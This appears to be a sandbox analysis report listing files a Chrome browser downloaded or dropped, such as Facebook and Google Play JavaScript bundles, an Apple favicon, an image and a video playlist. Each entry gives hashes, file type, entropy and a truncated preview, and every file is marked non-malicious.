                                                                                                                                                                                                                                SHA-256:EA54FEA4CE7FCA6339E5B437CA43CBD46C84AA46477BE66436608B5FB0A9E02C
                                                                                                                                                                                                                                SHA-512:84F96774BF4E8CE6BDFFC68AB6ADFBAA7508BD8E9A3372A33C0032FB519BF51A6AFB34CD70CE8A84C32A1F4BEC2442B87CB5CBEE86EDD468D510E502705D4788
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://apps.apple.com/favicon.ico
                                                                                                                                                                                                                                Preview:......00..........6... ......................h....)..(...0...`................................r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..v..v..u..v..v..u..u..u..v..u..v..v..v..u..v..v..u..u..u..v..u..u..v..v..v..u..v..u..u..u..v..u..u..v..v..v..u..v..v..u..u..u..v..u..u..v..v..u..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..}..}..}..}..}..}..}..}..}..}..}..}..}..}.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (32588)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):82019
                                                                                                                                                                                                                                Entropy (8bit):5.75815842860286
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:mtw5hvigCLIGBPIim0sKymy8W2Cu20u6SMiNckCuvw4Im+gSUQJywmO8SQ:AIYLI0PIim0sKymy8W2Cu20u6gCuvw4l
                                                                                                                                                                                                                                MD5:04EB01E703BC623D3F6E42D711DBD908
                                                                                                                                                                                                                                SHA1:DB5243F2BB2142983BD3794E36DAEE6D186C6EDE
                                                                                                                                                                                                                                SHA-256:029D5D5363C4A3A6D4175D60BE60CA6B58CDF71CB91D059B3AD16AE9C5B3CAC8
                                                                                                                                                                                                                                SHA-512:9668CFB29C176DA1BFF9DC66FEC700D5FF2FB33127D48CAD38EFA2070CD7CCA5AA1B9D55399FFD19604AA89F03B2A8D2882A7276E460EA5EF3AE094ABCD6CFF1
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3/yT/r/DHWoESmf_2P.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("Nectar",["Env","getContextualParent"],(function(a,b,c,d,e,f){var g;function h(a){a.nctr||(a.nctr={})}function i(a){if((g||(g=b("Env"))).module||!a)return(g||(g=b("Env"))).module;var c={fbpage_fan_confirm:!0,photos_snowlift:!0},d;while(a&&a.getAttribute){var e=a.getAttribute("id");if(e!=null&&e.startsWith("pagelet_"))return e;!d&&c[e]&&(d=e);a=b("getContextualParent")(a)}return d}a={addModuleData:function(a,b){b=i(b);b&&(h(a),a.nctr._mod=b)}};e.exports=a}),null);.__d("AsyncRequestNectarLogging",["AsyncRequest","Nectar"],(function(a,b,c,d,e,f,g){Object.assign(c("AsyncRequest").prototype,{setNectarModuleData:function(a){this.method=="POST"&&d("Nectar").addModuleData(this.data,a)}})}),34);.__d("DamerauLevenshtein",[],(function(a,b,c,d,e,f){function a(a,b){if(a.length===0)return b.length;if(b.length===0)return a.length;if(a===b)return 0;var c,d,e=[];e[0]=[];e[1]=[];e[2]=[];for(d=0;d<=b.length;d++)e[0][d]=d;for(c=1;c<=a.length;c++)for(d=1;d<=b.length;d++){e[c%3][0]=c;
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (31314)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60048
                                                                                                                                                                                                                                Entropy (8bit):5.613673120689179
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:MmmMY11y2OuW8w+P1xB9Gpvv5JVscSiJhWJPRJPFasWTtUtD/JAKC5ptGu1zgLEJ:Sgl5aB6ubPtrOOu1h
                                                                                                                                                                                                                                MD5:C78698C36084964D3D5A5932C216B647
                                                                                                                                                                                                                                SHA1:7C88A8FB463BB2E113B101BE1F4B654B85B1DFC5
                                                                                                                                                                                                                                SHA-256:34A21C1FA740D9AC59170F8F047FB33D15965E292BBBDA04A9E79C58CEE38BD0
                                                                                                                                                                                                                                SHA-512:75ACF6CEDB5DED24A054DF870C24EE74DC43FF9B56C4044C06662A6FA091D48DAD0133CB21ADA97B5B2C305BA80ADA66FADBC0B4321E004E4EBAC97648737244
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html lang="en" id="facebook" class="no_js">.<head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="PIHjeYla">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"ajaxpipe_token":"AXgONA8fCKnsGI7-lDA","stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ7zhOZlKDbaDDOqau0","isCQuick":false,"brsid":"7419923937127217553"});</script><script nonce="PIHjeYla">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="PIHjeYla"></style><script nonce="PIHjeYla">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/shared/user_preferences/?_fb_noscript=1" /
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (17932)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):18154
                                                                                                                                                                                                                                Entropy (8bit):4.913619694300307
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:7YNwwESzQnZKETYN2COZYcUBQA4LxWm3CKgB+2RR:yhNzrXNAtU9ArbM+AR
                                                                                                                                                                                                                                MD5:73111912F4B4F7A5B5501DC74D50025B
                                                                                                                                                                                                                                SHA1:94BAE7BE09CAE37C16321425B151EB0DE4592F0D
                                                                                                                                                                                                                                SHA-256:AB6777F622DCE53EFA7D6A93432292AFBA7757445EB4CC111B25810882375B98
                                                                                                                                                                                                                                SHA-512:DB7A6BF34BD0E3C739917EAD6BC24D31B63420498476756E99AAB232F7D14A9D0A86DD90764440089B66B2D544A327884F17B566DD02EB783360DA749789B738
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/../**. * License: https://www.facebook.com/legal/license/t3hOLs8wlXy/. */.__d("javascript-blowfish-1.0.5",[],(function(a,b,c,d,e,f){"use strict";b={};var g={exports:b};function h(){var a=function(b,c){this.key=b,(c==="ecb"||c==="cbc")&&(this.mode=c),this.sBox0=a.sBox0.slice(),this.sBox1=a.sBox1.slice(),this.sBox2=a.sBox2.slice(),this.sBox3=a.sBox3.slice(),this.pArray=a.pArray.slice(),this.generateSubkeys(b)};a.prototype={sBox0:null,sBox1:null,sBox2:null,sBox3:null,pArray:null,key:null,mode:"ecb",iv:"abc12345",keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encrypt:function(a,b){if(this.mode==="ecb")return this.encryptECB(a);if(this.mode==="cbc")return this.encryptCBC(a,b);throw new Error("\u041d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0439 \u0440\u0435\u0436\u0438\u043c \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f.")},decrypt:function(a,b){if(this.mode==="ecb")return this.decryptECB(a);if(this.mode==="cbc")retur
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (3866)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):33229
                                                                                                                                                                                                                                Entropy (8bit):5.52332107809849
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:qj0AsLWsZmQpp8SCZd+jZ4U/ZAzwznMp058TCUb/3Moq9zbjBRq6LX:Qcm6pvvnBRD
                                                                                                                                                                                                                                MD5:C902F6616E13701E299223748DE72D44
                                                                                                                                                                                                                                SHA1:6558DA57C9F74BB1D03DB994D1F92B96AD8587C5
                                                                                                                                                                                                                                SHA-256:141B75CC8F99E2D499DFBAD14B3B82BCA3BC25AB4E4F27355D418F645403514A
                                                                                                                                                                                                                                SHA-512:42BF103EEC7EE60064BBF677C8E0877B89630B65E71BD62ACF5522358C92DBBB796B970EE7D101E46D967A1D444533A20BCB22BD7F7F71E4B7626F1718790066
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:"https://www.gstatic.com/_/boq-play/_/js/k=boq-play.PlayStoreUi.ru.rIMe_465lJE.2021.O/ck=boq-play.PlayStoreUi.Y1yArtXW1Kk.L.B1.O/am=R7cZwOj6QDAJDPAPHgdjAQ/d=1/exm=FCpbqb,LEikZe,WhJNk,Wt6vjf,_b,_tp,byfTOb,hhhU8,lsjVmc/excm=_b,_tp,searchview/ed=1/wt=2/ujg=1/rs=AB1caFXJl0m234JZdkIlc9Y8a_1vUWHvZw/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;Hs0fpd:jLUKge;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;Rdd4dc:WXw8B;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAu0tf:z5Gxfe;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;sgjhQc:bQAegc;wR5FRb:O1Gjze;xqZiqf:BBI74;yEQyxe:TLjaTd;yxTchf:KUM7Z;zxnPse:GkRiKb/m=RqjULd"
                                                                                                                                                                                                                                Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.Nq=function(a){var b=_.td("nQyAE",window);var c=_.td("TSDtV",window);if(c&&typeof c==="string"){var d=_.Wg(_.Mh(c,_.dwa),_.Lq,1,_.Sg())[0];if(d){c={};for(e of _.Wg(d,_.ewa,2,_.Sg()))switch(d=_.I(e,7),_.Vg(e,_.Mq)){case 3:c[d]=_.hh(e,_.Ng(e,_.Mq,3));break;case 2:c[d]=_.jh(e,_.Ng(e,_.Mq,2));break;case 4:c[d]=_.aia(e,_.Ng(e,_.Mq,4));break;case 5:c[d]=_.th(e,5,_.Mq)}var e=c}else e={}}else e={};if(e&&Object.keys(e).length>0)for(let f of Object.keys(e))f in b||(b[f]=e[f]);b=b[a];return b!==void 0?new _.vd("nQyAE."+.a,b):null};_.fwa=function(a){return new Uint8Array(_.vc(a)||0)};_.Oq=function(a){var b=[];const c=a.Rb==null?null:_.zia(a,_.Bia(a));return c===null?_.zia(a,b):c};_.ewa=class extends _.z{constructor(a){super(a)}};_.Mq=[2,3,4,5,6];_.Lq=class extends _.z{constructor(a){super(a)}};_.Lq.prototype.N=_.p(36);_.dwa=_.od(class extends _.z{constructor(a){super(a)}});._.INa=new Set([1]);_.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 166x296, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):11894
                                                                                                                                                                                                                                Entropy (8bit):7.98342607811884
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:dcYaJBNV6lne4iMA2YBrAvCIODgv9T1cGrK/Mb9O66bK+v/FiM:dVaWlwMAnqvCIODgnpUq9Ole+v/FT
                                                                                                                                                                                                                                MD5:4D44567B356D4E4FAEBE3A88FDB84B84
                                                                                                                                                                                                                                SHA1:EC4D3AEB588CC0BE162D790A0FC75B24096139E3
                                                                                                                                                                                                                                SHA-256:98FAD711CCCE1DE287BB8A98006D5231F52AFA9921CC5D637C583B41E1B9ACEC
                                                                                                                                                                                                                                SHA-512:60EBB4691889FE1C58202E698C8DCF1C39E7648F9F36601FA33AB370FE2A0CCC521B6C774E4F66CA9ADE361C81A7383F85D419986AF804390253D50C5F7679F1
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://play-lh.googleusercontent.com/LCVRRBHTcHs2NFs14MsnVMA51vENNhT-VUex4HRMXuBZmVJ1b6lJOTJnwC5LcSPurg=w526-h296-rw
                                                                                                                                                                                                                                Preview:RIFFn...WEBPVP8 b........*..(.>a(.E$"....L@....8....w5.....a.<?.o.. .'./.~........>[.........%.3...Of_...{..........g.K.W......{......Y......./...?......w.{......./M........q>..g............._F...7...*^.......!|a......?....].........[..........g._..B...........~.........c..{..0.....'...~....g.O.............?.......././.o........].w./._....7..=.~....:.s...C..R...s.9_.}?..q930..!7....O...JD2.fp..372%.......r..kdq...1h.i...y./-`.H..*.L..u..umo.9.....#.KYh.6H!4{:.@.Q.g.Z.J7......8...C..$TP..G....I@.9}....b.....-o...W.Y..bZs...X...MQy8I..5.Z..?...Z.OvI..s....]..xL...z.UHL2.1..l.......g].=...Zw..i.K...=.|.Z\....P.st.S~....D.Q...O.qv....Y.b..4(............i.rRd..........:f.!I%R/C...n.DM.!.B_.D.T.*8%...+.t.....0.c...}.....;...&.....R...Z..,fqJ.i..6.LR..O.%....'`..c.......b./+|........q1<.=6.w.....e.v=...m.36..b.V...w....|.c...,........>..c...w.C...y.9&./."..\0=q^X?sN`#...X.........G.......>k.9........@.<.;.4.r$R.1[.&..~b.9..A....z.-...@..i...%.o.'`..f;..
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:M3U playlist, ASCII text
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):903
                                                                                                                                                                                                                                Entropy (8bit):5.372090323906076
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:PNfsAAjdrNW8/t3JdrAjP1drAYc6drXvuYJdravSgdrA0HdrRmHTdrS5:lfRcdprdM9dkAdjGYJdmKgd9HdMTdM
                                                                                                                                                                                                                                MD5:255473BB47E5EDD79F2CCBFB9F6D4369
                                                                                                                                                                                                                                SHA1:8724C535C715E135246F2292340136F3E47BAE20
                                                                                                                                                                                                                                SHA-256:C29E311AD195EBB97EA8C62F5B4A42FFEAACE8DE3E83AF4170A61B1C3730F163
                                                                                                                                                                                                                                SHA-512:6575FA3FBD52B465EE25EDC55726BEC219B233D4F62F60C68810C107217D8FA9EC6F45C6D090F09A6628EDDC7968FB3060DEB42A785260F9F25B3D307C7F9466
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:#EXTM3U.#EXT-X-TARGETDURATION:6.#EXT-X-VERSION:7.#EXT-X-MEDIA-SEQUENCE:0.#EXT-X-PLAYLIST-TYPE:VOD.#EXT-X-INDEPENDENT-SEGMENTS.#EXT-X-MAP:URI="P875466468_Anull_video_gr250_sdr_652x1412-.mp4",BYTERANGE="899@0".#EXTINF:3.60000,..#EXT-X-BYTERANGE:1647776@899.P875466468_Anull_video_gr250_sdr_652x1412-.mp4.#EXTINF:5.70000,..#EXT-X-BYTERANGE:2090789@1648675.P875466468_Anull_video_gr250_sdr_652x1412-.mp4.#EXTINF:3.53333,..#EXT-X-BYTERANGE:911497@3739464.P875466468_Anull_video_gr250_sdr_652x1412-.mp4.#EXTINF:2.63333,..#EXT-X-BYTERANGE:621829@4650961.P875466468_Anull_video_gr250_sdr_652x1412-.mp4.#EXTINF:3.63333,..#EXT-X-BYTERANGE:1666431@5272790.P875466468_Anull_video_gr250_sdr_652x1412-.mp4.#EXTINF:5.70000,..#EXT-X-BYTERANGE:2040977@6939221.P875466468_Anull_video_gr250_sdr_652x1412-.mp4.#EXTINF:5.20000,..#EXT-X-BYTERANGE:1551608@8980198.P875466468_Anull_video_gr250_sdr_652x1412-.mp4.#EXT-X-ENDLIST.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (4413)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):70119
                                                                                                                                                                                                                                Entropy (8bit):5.482416944401544
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:yRCgsRrWCaqcPCCB/HwWrWyt7wlwLBxDfiVjlhslrtiIG1XUAmPGiwNj9:yRCgqWCaq/CBP1xDfiVjVeS9
                                                                                                                                                                                                                                MD5:90EBCEDEA8A84F7D95E2447FC91A0D54
                                                                                                                                                                                                                                SHA1:BEF5971C8BD0ED27310B88E3564997B59CF8C7A7
                                                                                                                                                                                                                                SHA-256:381B76E1A851B6355A701EE40DE603339C3F9B035A05EF22C671B89724214638
                                                                                                                                                                                                                                SHA-512:89BB9242D90619E43D7F8082C286894462120ADD718CF2EF7B98E440ED6DBC5F56FF4DD5058DF7AA793DE4749C6EE58E52A143A0EF94FE5E7B1F7A4DD3146078
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3ivAx4/yo/l/en_GB/48NDuq1PGrS.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("AbstractTextField.react",["cx","DangerouslyAccessReactElementInternals_DO_NOT_USE_IN_NEW_CODE","Keys","joinClasses","react"],(function(a,b,c,d,e,f,g){var h,i=h||b("react");a=function(a){"use strict";babelHelpers.inheritsLoose(c,a);function c(){var c,d;for(var e=arguments.length,f=new Array(e),g=0;g<e;g++)f[g]=arguments[g];return(c=d=a.call.apply(a,[this].concat(f))||this,d.state={focused:!1,value:d.props.defaultValue||""},d.onInputKeyDown=function(a){var c=d.props,e=a.keyCode,f=a.shiftKey;e===b("Keys").BACKSPACE&&!f&&c.onBackspace?c.onBackspace(a):e===b("Keys").TAB&&!f&&c.onTab?c.onTab(a):e===b("Keys").TAB&&f&&c.onBackTab?c.onBackTab(a):e===b("Keys").UP?f?c.onShiftUpArrow&&c.onShiftUpArrow(a):c.onUpArrow&&c.onUpArrow(a):e===b("Keys").DOWN&&c.onDownArrow?f?c.onShiftDownArrow&&c.onShiftDownArrow(a):c.onDownArrow&&c.onDownArrow(a):e===b("Keys").LEFT&&c.onLeftArrow?c.onLeftArrow(a):e===b("Keys").RIGHT&&c.onRightArrow?c.onRightArrow(a):e===b("Keys").RETURN?(c.onEnter
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (2974)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):5493
                                                                                                                                                                                                                                Entropy (8bit):5.3972003055891165
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:98H8NJ808l8ch5h5Nlz/G0VsbQ6KTGgG2RlhUDxh66aTEoKTt:98H8D808l8i5h5NlzeIs5723hUjaAh
                                                                                                                                                                                                                                MD5:AC310E9AA6803396643CC705D292081F
                                                                                                                                                                                                                                SHA1:CA02EE3EFF60651EC231113F57924EFBD8600CBA
                                                                                                                                                                                                                                SHA-256:2E008E8F51E7714B45C90B3F1EB9DC53ECE6D04CD36F230D94DC57CECC64E36E
                                                                                                                                                                                                                                SHA-512:BE808436D234B818CD5B95EC40C74C61788C4F42411533A99ECE8C5E178D8EC91FEDA1A0A87D42894141EE085621A26BBD2156124DA9D1C1F989A0B38B415750
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("IntlCLDRNumberType03",["IntlVariations"],(function(a,b,c,d,e,f,g){"use strict";a={getVariation:function(a){if(a===0||a===1)return c("IntlVariations").NUMBER_ONE;else return c("IntlVariations").NUMBER_OTHER}};b=a;g["default"]=b}),98);.__d("IntlCLDRNumberType30",["IntlVariations"],(function(a,b,c,d,e,f,g){"use strict";a={getVariation:function(a){if(a%10===1&&a%100!==11)return c("IntlVariations").NUMBER_ONE;else if(a%10>=2&&a%10<=4&&(a%100<12||a%100>14))return c("IntlVariations").NUMBER_FEW;else return c("IntlVariations").NUMBER_MANY}};b=a;g["default"]=b}),98);.__d("JSResource",["JSResourceReferenceImpl"],(function(a,b,c,d,e,f,g){var h={};function i(a,b){h[a]=b}function j(a){return h[a]}function a(a){a=a;var b=j(a);if(b)return b;b=new(c("JSResourceReferenceImpl"))(a);i(a,b);return b}a.loadAll=c("JSResourceReferenceImpl").loadAll;g["default"]=a}),98);.__d("QpActionFalcoEvent",["FalcoLoggerInternal","getFalcoLogPolicy_DO_NOT_USE"],(function(a,b,c,d,e,f,g){"use strict
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (20398)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):354326
                                                                                                                                                                                                                                Entropy (8bit):5.402542515680638
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:Wjx6Fh5yD6y2yjEKLPGMZMg9bV4XG77jzfwWEf8/:Wsv8D6y0KLPGMZZ9bVj7wWEf8/
                                                                                                                                                                                                                                MD5:25E4014B07BBBA82DAF9E43D50280FB8
                                                                                                                                                                                                                                SHA1:465FF25F0AACB572CD6F701D76CCBF3897951E65
                                                                                                                                                                                                                                SHA-256:C92D4A3BB4BDC316E737064741F09C6079E8C5352E4D7E3286D9CD08329D8FAF
                                                                                                                                                                                                                                SHA-512:79FB0B015225233A7CBB4391DEC5573F9EC274346129DDD24F3787F5CDB09370A839EC6C04629CEFC7CB1DC2DEB241FE2BDBD88AE2A9661D9983251AA93B32DF
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3/y1/r/s1oFVSwofs5.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/.."use strict";(function(){var a=typeof globalThis!=="undefined"&&globalThis||typeof self!=="undefined"&&self||typeof global!=="undefined"&&global;if(typeof a.AbortController!=="undefined")return;var b=function(){function a(){this.__listeners=new Map()}a.prototype=Object.create(Object.prototype);a.prototype.addEventListener=function(a,b,c){if(arguments.length<2)throw new TypeError("TypeError: Failed to execute 'addEventListener' on 'CustomEventTarget': 2 arguments required, but only "+arguments.length+" present.");var d=this.__listeners,e=a.toString();d.has(e)||d.set(e,new Map());var f=d.get(e);f.has(b)||f.set(b,c)};a.prototype.removeEventListener=function(a,b,c){if(arguments.length<2)throw new TypeError("TypeError: Failed to execute 'addEventListener' on 'CustomEventTarget': 2 arguments required, but only "+arguments.length+" present.");var d=this.__listeners,e=a.toString();if(d.has(e)){var f=d.get(e);f.has(b)&&f["delete"](b)}};a.prototype.dispatchEvent=function(a){if
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (12570)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):110588
                                                                                                                                                                                                                                Entropy (8bit):5.284527927126575
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:dgxM88ofq9SwUu3aLYDfxnCFhRhpfvvrTxbM2Zgs1Keypi:OOJolwUmhC/RPfBD1Kemi
                                                                                                                                                                                                                                MD5:04BBACBF1A57E9D2BD0EA3D9A0D51358
                                                                                                                                                                                                                                SHA1:586A99D75A4A0EEFBE18D616DF5B9FACF84B5D4E
                                                                                                                                                                                                                                SHA-256:F31A9F9C6587ECF268F553462016F2E3E335BE3A83C0C167E391BA5B7FC58092
                                                                                                                                                                                                                                SHA-512:17DA648EB102098F27FA801A859C81A01F9B76630B1274DCF760A8509682942C67BD28527471256668B47AE710F8C9BE67494AF5E4974E68831918BFDD332F3D
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("ARIA",["DOM","emptyFunction","ge","getOrCreateDOMID","joinClasses"],(function(a,b,c,d,e,f,g){var h,i,j=function(){h=c("ge")("ariaAssertiveAlert"),h||(h=c("DOM").create("div",{id:"ariaAssertiveAlert",className:c("joinClasses")("accessible_elem","accessible_elem_offset"),"aria-live":"assertive"}),c("DOM").appendContent(document.body,h)),i=c("ge")("ariaPoliteAlert"),i||(i=h.cloneNode(!1),i.setAttribute("id","ariaPoliteAlert"),i.setAttribute("aria-live","polite"),c("DOM").appendContent(document.body,i)),j=c("emptyFunction")};function k(a,b){j();b=b?h:i;c("DOM").setContent(b,a)}function a(a){for(var b=arguments.length,d=new Array(b>1?b-1:0),e=1;e<b;e++)d[e-1]=arguments[e];var f=d.map(function(a){return c("getOrCreateDOMID")(a)}).join(" ");a.setAttribute("aria-controls",f)}function b(a){for(var b=arguments.length,d=new Array(b>1?b-1:0),e=1;e<b;e++)d[e-1]=arguments[e];var f=d.map(function(a){return c("getOrCreateDOMID")(a)}).join(" ");a.setAttribute("aria-describedby",
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (20738)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):86597
                                                                                                                                                                                                                                Entropy (8bit):5.7667639352954785
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:1S6F7vZeqFfh5kVEgpEI9Ps9Zlv4o5Iq7mGsq53Jttzp5QOyo:1S6F7vZeqNh5wEqFPKlvB9go
                                                                                                                                                                                                                                MD5:6B7F0B1E0AF3E89F3D580DFB2E84082B
                                                                                                                                                                                                                                SHA1:C3352E72C4CD682DF4B4DD8F14AD013578FC04CB
                                                                                                                                                                                                                                SHA-256:1B03380EF0ED1C355563B423B11292507D9B0DF47FD1110D1E20A2A370AEB580
                                                                                                                                                                                                                                SHA-512:164E81E1A9F7D6DC82AE2E627202908AB9ED3EC8EA2F9CDFD94206D8A19808A7DBEE461B303F41E45D95E7867327A5BEC17B569382008A7A427F4C639772C89F
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("AdsGetAdsHelpTrayOpenOnClick",["AdsHelpTrayUIActions","AdsHelpTrayUIProvider"],(function(a,b,c,d,e,f,g){"use strict";function a(a){var b=a.dialogWidth,e=a.forceNewWindow,f=e===void 0?!1:e,g=a.helpCenterID,h=a.source,i=a.onClick;return function(a){var e=f;if(b!=null){var j=b+c("AdsHelpTrayUIProvider")().helpTrayOpenWidth*2;window.innerWidth<j&&(e=!0)}e||(a.preventDefault(),a.stopPropagation(),d("AdsHelpTrayUIActions").pushCMSIDToHistory(g,h));i&&i(a)}}g["default"]=a}),98);.__d("AdsLearnMoreStrings",["fbt"],(function(a,b,c,d,e,f,g,h){"use strict";a=h._("Learn more");b=h._("Learn more");c=h._("people");d=h._("Learn more about Meta placements");e=h._("Learn about audience.");f=h._("Learn more about attribution settings");g.INLINE_LEARN_MORE=a;g.STANDALONE_LEARN_MORE=b;g.INLINE_PEOPLE_TEXT=c;g.PLACEMENTS_LEARN_MORE=d;g.INLINE_LEARN_MORE_ABOUT_AUDIENCE=e;g.INLINE_LEARN_MORE_ATTRIBUTION_SETTINGS=f}),226);.__d("GeoInvertedThemeProvider",["GeoPrivateInvertThemeContext","
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65475)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):805933
                                                                                                                                                                                                                                Entropy (8bit):5.389545949651775
